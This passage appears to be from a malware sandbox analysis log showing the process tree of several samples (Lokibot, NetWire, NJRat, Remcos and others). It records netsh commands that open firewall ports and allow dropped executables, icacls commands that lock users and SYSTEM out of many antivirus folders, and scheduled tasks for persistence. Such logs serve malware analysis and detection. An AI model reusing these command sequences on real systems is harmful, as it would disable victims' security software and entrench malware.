    netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:19492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
  2⤵
  PID:3140
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:10768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
  2⤵
  PID:8536
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:5228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
  2⤵
  PID:13736
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:9424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
  2⤵
  PID:15556
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:9268
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
  2⤵
  PID:15300
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:15928
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
  2⤵
  PID:2004
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:17800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
  2⤵
  PID:17152
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:10616
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
  2⤵
  PID:15092
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:17864
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
  2⤵
  PID:14648
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:17820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
  2⤵
  PID:13664
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
    3⤵
    - Modifies Windows Firewall
    PID:17476
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
  2⤵
  PID:6956
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
    3⤵
    - Modifies Windows Firewall
    PID:7452
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:14904
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2900
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
  2⤵
  PID:8976
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:10260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:16764
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:11160
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
  2⤵
  PID:15316
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:12824
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:15812
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2488
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
  2⤵
  PID:14288
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4368
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6960
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:14592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
  2⤵
  PID:12812
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:16980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6328
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:13372
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
  2⤵
  PID:13388
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:9376
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7652
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:14028
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
  2⤵
  PID:7792
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:12200
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7204
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:11852
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
  2⤵
  PID:16364
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
  2⤵
  PID:15136
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:15496
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
  2⤵
  PID:6980
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:9264
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
  2⤵
  PID:6336
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:17356
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
  2⤵
  PID:7896
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:9796
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
  2⤵
  PID:12104
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:15768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
  2⤵
  PID:14972
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:8508
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
  2⤵
  PID:10756
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
  2⤵
  PID:12720
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:9064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4840
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:11808
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
  2⤵
  PID:11324
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:14596
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
  2⤵
  PID:12724
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:11956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:19540
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:15996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
  2⤵
  PID:19420
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:16664
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
  2⤵
  PID:8864
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:20112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:384
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:15568
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:19992
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:8308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:17424
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:14712
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:13308
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7528
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:9772
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6692
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:11868
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:14992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:20188
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:15788
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:8540
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3580
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:10772
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:12348
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:15720
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:20208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1936
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:19232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6936
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:14552
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:20292
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:19240
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:8700
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:16552
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:5452
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:13120
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:15032
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:8460
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
  2⤵
  PID:9548
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:11336
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6592
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:20404
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:16416
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:16496
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:12188
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:9328
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:9528
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:13824
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:17704
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:18316
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:17552
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:12248
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:17184
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:11756
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:9360
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:14216
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:14576
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:12096
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:15172
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:10012
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7728
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:13648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:14272
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6156
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:5432
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:9312
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:8136
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:13988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:18204
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:18380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:13788
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:15320
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:15972
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:18944

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Lokibot.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Lokibot.exe"
1⤵
PID:6264
- C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Lokibot.exe
  "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Lokibot.exe"
  2⤵
  PID:13892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:7588

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"
1⤵
PID:1200
- C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe
  "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"
  2⤵
  PID:14452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:9084

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NJRat.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NJRat.exe"
1⤵
PID:7352
- C:\Windows\SysWOW64\netsh.exe
  netsh firewall add allowedprogram "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NJRat.exe" "NJRat.exe" ENABLE
  2⤵
  - Modifies Windows Firewall
  PID:16348
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
  dw20.exe -x -s 1116
  2⤵
  PID:11472

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\Remcos.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\Remcos.exe"
1⤵
PID:16832
- C:\Windows\SysWOW64\cmd.exe
